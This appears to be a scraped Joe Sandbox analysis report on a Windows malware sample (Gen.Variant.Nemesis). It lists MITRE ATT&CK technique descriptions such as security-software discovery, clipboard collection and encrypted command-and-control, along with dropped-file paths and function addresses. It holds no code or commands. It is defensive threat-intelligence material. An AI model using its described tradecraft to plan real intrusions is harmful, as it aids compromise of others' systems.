Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

AV Detection

E-Banking Fraud

Stealing of Sensitive Information

Remote Access Functionality

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne\Hjernearbejder.Mes

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne\input-mouse-symbolic.svg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Systemkvaliteternes.Jug

C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll

C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Thow.lnk

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Function 00403373 Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412
stringfilecomCOMMON

Function 00405425 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405990 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 004065C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Function 00403D3E Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Function 00403990 Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402EC1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 004062A4 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004052E6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 004030FA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166
COMMON

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre